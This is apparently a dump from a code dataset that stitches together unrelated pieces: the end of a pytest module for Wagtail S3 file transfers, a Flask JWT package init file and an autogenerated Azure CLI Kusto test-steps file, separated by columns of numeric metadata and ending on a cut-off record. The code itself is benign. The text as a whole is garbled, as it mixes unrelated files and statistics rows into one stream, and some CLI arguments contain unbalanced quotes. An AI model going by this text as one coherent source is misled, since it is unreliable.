        source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        source_bucket='magna-fake-example.s3.amazonaws.com',
        source_key='path/to/file.jpg',
    )
    mock_s3_file.transfer.assert_called_once_with()  # Deliberately no args
    # show the imported file is NOT in the cache because we failed
    assert 'MOCK_SOURCE_URL_VALUE' not in mock_context.imported_files_by_source_url
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_4():
    # 4. File was already imported - no need to re-import
    file_field = FileField()
    file_field.get_attname = mock.Mock(return_value='some-filefield')
    mock_field_value = mock.Mock(name='mock_field_value')
    mock_field_value.storage.bucket.name = 'test-bucket-name'
    mock_field_value.name = 'test-bucket-key'
    file_field.value_from_object = mock.Mock(return_value=mock_field_value)
    mock_instance = mock.Mock()
    adapter = S3FileFieldAdapter(file_field)
    fake_value = {
        'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        'size': 123321,
        'hash': 'aabbccddeeff665544332211',
    }
    adapter._get_imported_file_bucket_and_key = mock.Mock()
    mock_imported_file = mock.Mock(name='mock_imported_file')
    mock_context = mock.Mock()
    # pre-populate the cache so the file counts as already imported
    mock_context.imported_files_by_source_url = {
        'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg': mock_imported_file
    }
    mock_get_relevant_s3_meta = mock.Mock()
    mock_S3WagtailTransferFile = mock.Mock()  # noqa N806
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
            adapter.populate_field(
                instance=mock_instance,
                value=fake_value,
                context=mock_context,
            )
    # nothing was re-fetched or re-transferred
    assert adapter._get_imported_file_bucket_and_key.call_count == 0
    assert mock_get_relevant_s3_meta.call_count == 0
    assert mock_S3WagtailTransferFile.call_count == 0
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_5():
    # 5. Null `value` param, we abandon early
    file_field = FileField()
    file_field.get_attname = mock.Mock(return_value='some-filefield')
    file_field.value_from_object = mock.Mock()
    mock_instance = mock.Mock()
    adapter = S3FileFieldAdapter(file_field)
    fake_value = {}  # falsy -> populate_field should bail out immediately
    adapter._get_imported_file_bucket_and_key = mock.Mock()
    mock_context = mock.Mock()
    mock_get_relevant_s3_meta = mock.Mock()
    mock_S3WagtailTransferFile = mock.Mock()  # noqa N806
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
            adapter.populate_field(
                instance=mock_instance,
                value=fake_value,
                context=mock_context,
            )
    # nothing at all was touched
    assert file_field.value_from_object.call_count == 0
    assert adapter._get_imported_file_bucket_and_key.call_count == 0
    assert mock_get_relevant_s3_meta.call_count == 0
    assert mock_S3WagtailTransferFile.call_count == 0
####################################################################################################
@override_settings(AWS_STORAGE_BUCKET_NAME='magna-fake-bucket-2')
@mock.patch('core.wagtail_hooks.s3.meta.client.copy')
@mock.patch('core.wagtail_hooks.ImportedFile.objects.create')
def test_s3wagtailtransferfile__transfer(
    mock_importedfile_objects_create,
    mock_s3_client_copy,
):
    """transfer() copies the object to the destination bucket and records an ImportedFile."""
    file = S3WagtailTransferFile(
        local_filename='path/to/file.jpg',  # not changed by DefaultStorage in this test
        size=123321,
        hash_='aabbccddeeff665544332211',
        source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        source_bucket='magna-fake-bucket-1.s3.amazonaws.com',
        source_key='path/to/file.jpg',
    )
    # constructor stores the values verbatim
    assert file.local_filename == 'path/to/file.jpg'
    assert file.size == 123321
    assert file.hash == 'aabbccddeeff665544332211'
    assert file.source_url == 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg'
    assert file.source_bucket == 'magna-fake-bucket-1.s3.amazonaws.com'
    assert file.source_key == 'path/to/file.jpg'
    assert not mock_s3_client_copy.called
    file.transfer()
    # copy goes from the source bucket/key into the configured destination bucket
    mock_s3_client_copy.assert_called_once_with(
        {'Bucket': file.source_bucket, 'Key': file.source_key},
        'magna-fake-bucket-2',
        file.local_filename,
    )
    mock_importedfile_objects_create.assert_called_once_with(
        file=file.local_filename,
        source_url=file.source_url,
        hash=file.hash,
        size=file.size,
    )
@pytest.mark.parametrize(
    'exception_class',
    (
        RetriesExceededError,
        S3UploadFailedError,
        ValueError,
    ),
)
@mock.patch('core.wagtail_hooks.s3.meta.client.copy')
def test_s3wagtailtransferfile__transfer__covered_exceptions(mock_s3_client_copy, exception_class):
    """Copy failures of every covered class are re-raised as FileTransferError."""
    file = S3WagtailTransferFile(
        local_filename='path/to/file.jpg',  # not changed by DefaultStorage in this test
        size=123321,
        hash_='aabbccddeeff665544332211',
        source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        source_bucket='magna-fake-bucket-1.s3.amazonaws.com',
        source_key='path/to/file.jpg',
    )
    mock_s3_client_copy.side_effect = exception_class('Faked')
    with pytest.raises(FileTransferError):
        file.transfer()
@pytest.mark.parametrize(
    'user_media_on_s3,expected',
    (
        (True, {FileField: S3FileFieldAdapter}),
        (False, {}),
    ),
)
def test_register_s3_media_file_adapter(user_media_on_s3, expected):
    """The S3 adapter mapping is registered only when USER_MEDIA_ON_S3 is enabled."""
    with override_settings(USER_MEDIA_ON_S3=user_media_on_s3):
        registered = register_s3_media_file_adapter()
    assert registered == expected
def _fake_static(value):
return '/path/to/static/' + value
@mock.patch('core.wagtail_hooks.static')
def test_case_study_editor_css(mock_static):
    """editor_css emits a stylesheet link resolved through the static() helper."""
    mock_static.side_effect = _fake_static
    expected = '<link rel="stylesheet" href="/path/to/static/cms-admin/css/case-study.css">'
    assert editor_css() == expected
@pytest.mark.django_db
@pytest.mark.parametrize(
    'request_path',
    (
        '/test/path/',
        '/test/path/?token=test',
    ),
)
def test_authenticated_user_required__sets_next_param(rf, request_path):
    """Anonymous users are redirected to signup with the original path in ?next=."""
    instance = DetailPage()
    assert instance.authenticated_user_required_redirect_url == cms_slugs.SIGNUP_URL
    request = rf.get(request_path)
    request.user = AnonymousUser()
    output = wagtail_hooks.authenticated_user_required(instance, request, [], {})
    assert output.status_code == 302
    # Look the header up via __getitem__ (case-insensitive, supported on every
    # Django version) instead of the private HttpResponse._headers attribute,
    # which was removed in Django 3.2.
    assert output['location'] == f'{cms_slugs.SIGNUP_URL}?next={request_path}'
| 36.044687
| 110
| 0.71758
| 4,698
| 36,297
| 5.239038
| 0.101958
| 0.030472
| 0.016252
| 0.014789
| 0.796896
| 0.765002
| 0.741437
| 0.722748
| 0.699996
| 0.685248
| 0
| 0.020055
| 0.182605
| 36,297
| 1,006
| 111
| 36.080517
| 0.809532
| 0.135741
| 0
| 0.625179
| 0
| 0.031474
| 0.183038
| 0.077636
| 0
| 0
| 0
| 0
| 0.120172
| 1
| 0.042918
| false
| 0.001431
| 0.061516
| 0.001431
| 0.105866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
a3ef281949903194f343bbc5ef6451bc098855b5
| 190
|
py
|
Python
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 1
|
2018-07-31T14:39:08.000Z
|
2018-07-31T14:39:08.000Z
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 8
|
2018-08-30T21:54:32.000Z
|
2020-12-23T15:11:38.000Z
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 3
|
2018-11-13T19:35:43.000Z
|
2020-04-09T17:19:33.000Z
|
# Package entry point: re-export the public API of flask_jwt_consumer.
name = "flask_jwt_consumer"

from .flask_jwt_consumer import JWTConsumer
from .helpers import get_jwt_payload, get_jwt_raw
from .decorators import requires_jwt
from .errors import AuthError
| 27.142857
| 49
| 0.847368
| 28
| 190
| 5.428571
| 0.535714
| 0.105263
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110526
| 190
| 6
| 50
| 31.666667
| 0.899408
| 0
| 0
| 0
| 0
| 0
| 0.094737
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4306d76e81db038367abed5a9267bfb987af5ece
| 24,348
|
py
|
Python
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 1
|
2021-12-17T01:27:06.000Z
|
2021-12-17T01:27:06.000Z
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 5
|
2022-03-08T17:46:24.000Z
|
2022-03-23T18:27:45.000Z
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 5
|
2020-09-08T22:46:48.000Z
|
2020-11-08T14:54:35.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .. import try_manual
# EXAMPLE: /AttachedDatabaseConfigurations/put/AttachedDatabaseConfigurationsCreateOrUpdate
@try_manual
def step_attached_database_configuration_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration create '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--location "westus" '
'--cluster-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.Kusto/Clu'
'sters/{myCluster3}" '
'--database-name "kustodatabase" '
'--default-principals-modification-kind "Union" '
'--table-level-sharing-properties external-tables-to-exclude="ExternalTable2" '
'external-tables-to-include="ExternalTable1" materialized-views-to-exclude="MaterializedViewTable2" '
'materialized-views-to-include="MaterializedViewTable1" tables-to-exclude="Table2" '
'tables-to-include="Table1" '
'--resource-group "{rg}"',
checks=[])
test.cmd('az kusto attached-database-configuration wait --created '
'--name "{myAttachedDatabaseConfiguration2}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/get/AttachedDatabaseConfigurationsGet
@try_manual
def step_attached_database_configuration_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration show '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/get/KustoAttachedDatabaseConfigurationsListByCluster
@try_manual
def step_attached_database_configuration_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/put/KustoClustersCreateOrUpdate
@try_manual
def step_cluster_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster create '
'--cluster-name "{Clusters_3}" '
'--identity-type "SystemAssigned" '
'--location "southcentralus" '
'--enable-purge true '
'--enable-streaming-ingest true '
'--key-vault-properties key-name="" key-vault-uri="" key-version="" '
'--sku name="Standard_D11_v2" capacity=2 tier="Standard" '
'--resource-group "{rg}"',
checks=[])
test.cmd('az kusto cluster wait --created '
'--cluster-name "{Clusters_3}" '
'--resource-group "{rg}"',
checks=[])
# EXAMPLE: /Clusters/get/KustoClustersGet
@try_manual
def step_cluster_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster show '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersList
@try_manual
def step_cluster_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list '
'-g ""',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListByResourceGroup
@try_manual
def step_cluster_list2(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListResourceSkus
@try_manual
def step_cluster_list_sku(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-sku '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListSkus
@try_manual
def step_cluster_list_sku2(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-sku '
'-g ""',
checks=checks)
# EXAMPLE: /Clusters/patch/KustoClustersUpdate
@try_manual
def step_cluster_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster update '
'--name "{myCluster}" '
'--type "SystemAssigned" '
'--location "westus" '
'--enable-purge true '
'--enable-streaming-ingest true '
'--engine-type "V2" '
'--key-vault-properties key-name="keyName" key-vault-uri="https://dummy.keyvault.com" '
'key-version="keyVersion" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterAddLanguageExtensions
@try_manual
def step_cluster_add_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster add-language-extension '
'--name "{myCluster}" '
'--value language-extension-name="PYTHON" '
'--value language-extension-name="R" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterDetachFollowerDatabases
@try_manual
def step_cluster_detach_follower_database(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster detach-follower-database '
'--name "{myCluster}" '
'--attached-database-configuration-name "{myAttachedDatabaseConfiguration}" '
'--cluster-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.Kusto/clu'
'sters/{myCluster2}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterDiagnoseVirtualNetwork
@try_manual
def step_cluster_diagnose_virtual_network(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster diagnose-virtual-network '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterListFollowerDatabases
@try_manual
def step_cluster_list_follower_database(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-follower-database '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterListLanguageExtensions
@try_manual
def step_cluster_list_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-language-extension '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterRemoveLanguageExtensions
@try_manual
def step_cluster_remove_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster remove-language-extension '
'--name "{myCluster}" '
'--value language-extension-name="PYTHON" '
'--value language-extension-name="R" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClustersStart
@try_manual
def step_cluster_start(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster start '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClustersStop
@try_manual
def step_cluster_stop(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster stop '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/put/KustoClusterPrincipalAssignmentsCreateOrUpdate
@try_manual
def step_cluster_principal_assignment_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment create '
'--cluster-name "{myCluster}" '
'--principal-id "87654321-1234-1234-1234-123456789123" '
'--principal-type "App" '
'--role "AllDatabasesAdmin" '
'--tenant-id "12345678-1234-1234-1234-123456789123" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/get/KustoClusterPrincipalAssignmentsGet
@try_manual
def step_cluster_principal_assignment_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment show '
'--cluster-name "{myCluster}" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/get/KustoPrincipalAssignmentsList
@try_manual
def step_cluster_principal_assignment_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/put/KustoDatabasePrincipalAssignmentsCreateOrUpdate
@try_manual
def step_database_principal_assignment_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment create '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-id "87654321-1234-1234-1234-123456789123" '
'--principal-type "App" '
'--role "Admin" '
'--tenant-id "12345678-1234-1234-1234-123456789123" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/get/KustoDatabasePrincipalAssignmentsGet
@try_manual
def step_database_principal_assignment_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment show '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/get/KustoPrincipalAssignmentsList
@try_manual
def step_database_principal_assignment_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment list '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/delete/KustoDatabasePrincipalAssignmentsDelete
@try_manual
def step_database_principal_assignment_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment delete -y '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/put/Kusto ReadWrite database create or update
@try_manual
def step_database_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database create '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--parameters "{{\\"location\\":\\"westus\\",\\"properties\\":{{\\"softDeletePeriod\\":\\"P1D\\"}}}}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/get/KustoDatabasesGet
@try_manual
def step_database_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database show '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/get/KustoDatabasesListByCluster
@try_manual
def step_database_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/patch/KustoDatabasesUpdate
@try_manual
def step_database_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database update '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--parameters "{{\\"properties\\":{{\\"hotCachePeriod\\":\\"P1D\\"}}}}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseAddPrincipals
@try_manual
def step_database_add_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database add-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--value name="Some User" type="User" app-id="" email="user@microsoft.com" fqn="aaduser role="Admin" '
'--value name="Kusto" type="Group" app-id="" email="kusto@microsoft.com" fqn="aadgroup role="Viewer" '
'--value name="SomeApp" type="App" app-id="some_guid_app_id" email="" fqn="aadapp role="Admin" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseListPrincipals
@try_manual
def step_database_list_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database list-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseRemovePrincipals
@try_manual
def step_database_remove_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database remove-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--value name="Some User" type="User" app-id="" email="user@microsoft.com" fqn="aaduser role="Admin" '
'--value name="Kusto" type="Group" app-id="" email="kusto@microsoft.com" fqn="aadgroup role="Viewer" '
'--value name="SomeApp" type="App" app-id="some_guid_app_id" email="" fqn="aadapp role="Admin" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/delete/KustoDatabasesDelete
@try_manual
def step_database_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database delete -y '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/put/KustoDataConnectionsCreateOrUpdate
@try_manual
def step_data_connection_event_hub_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub create '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--location "westus" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/get/KustoDatabasesListByCluster
@try_manual
def step_data_connection_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection list '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/get/KustoDataConnectionsGet
@try_manual
def step_data_connection_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection show '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/patch/KustoDataConnectionsUpdate
@try_manual
def step_data_connection_event_hub_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub update '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--location "westus" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/post/KustoDataConnectionValidation
@try_manual
def step_data_connection_event(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub data-connection-validation '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--name "{myDataConnection}" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/delete/KustoDataConnectionsDelete
@try_manual
def step_data_connection_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection delete -y '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection2}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/delete/KustoClustersDelete
@try_manual
def step_cluster_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster delete -y '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/delete/AttachedDatabaseConfigurationsDelete
@try_manual
def step_attached_database_configuration_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration delete -y '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/delete/KustoClusterPrincipalAssignmentsDelete
@try_manual
def step_cluster_principal_assignment_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment delete -y '
'--cluster-name "{myCluster}" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /OperationsResults/get/KustoOperationResultsGet
@try_manual
def step_operation_result_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto operation-result show '
'--operation-id "30972f1b-b61d-4fd8-bd34-3dcfa24670f3" '
'--location "westus"',
checks=checks)
# EXAMPLE: /Scripts/put/KustoScriptsCreateOrUpdate
@try_manual
def step_script_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script create '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--continue-on-errors true '
'--force-update-tag "2bcf3c21-ffd1-4444-b9dd-e52e00ee53fe" '
'--script-url "https://mysa.blob.core.windows.net/container/script.txt" '
'--script-url-sas-token "?sv=2019-02-02&st=2019-04-29T22%3A18%3A26Z&se=2019-04-30T02%3A23%3A26Z&sr=b&sp=rw'
'&sip=168.1.5.60-168.1.5.70&spr=https&sig=********************************" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=[])
test.cmd('az kusto script wait --created '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/get/KustoScriptsGet
@try_manual
def step_script_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script show '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/get/KustoScriptsList
@try_manual
def step_script_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script list '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Scripts/patch/KustoScriptsUpdate
@try_manual
def step_script_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script update '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--continue-on-errors true '
'--force-update-tag "2bcf3c21-ffd1-4444-b9dd-e52e00ee53fe" '
'--script-url "https://mysa.blob.core.windows.net/container/script.txt" '
'--script-url-sas-token "?sv=2019-02-02&st=2019-04-29T22%3A18%3A26Z&se=2019-04-30T02%3A23%3A26Z&sr=b&sp=rw'
'&sip=168.1.5.60-168.1.5.70&spr=https&sig=********************************" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/delete/KustoScriptsDelete
@try_manual
def step_script_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script delete -y '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
| 36.779456
| 120
| 0.610112
| 2,409
| 24,348
| 6.07721
| 0.125363
| 0.049727
| 0.045287
| 0.052254
| 0.798907
| 0.750342
| 0.717008
| 0.664208
| 0.626981
| 0.606762
| 0
| 0.019112
| 0.245729
| 24,348
| 661
| 121
| 36.835098
| 0.778056
| 0.135494
| 0
| 0.758893
| 0
| 0.041502
| 0.465152
| 0.172264
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094862
| false
| 0
| 0.001976
| 0
| 0.096838
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
43132abdfb917f0de01729cb005aaa47244892f8
| 2,198
|
py
|
Python
|
skg/pow.py
|
bluenote10/scikit-guess
|
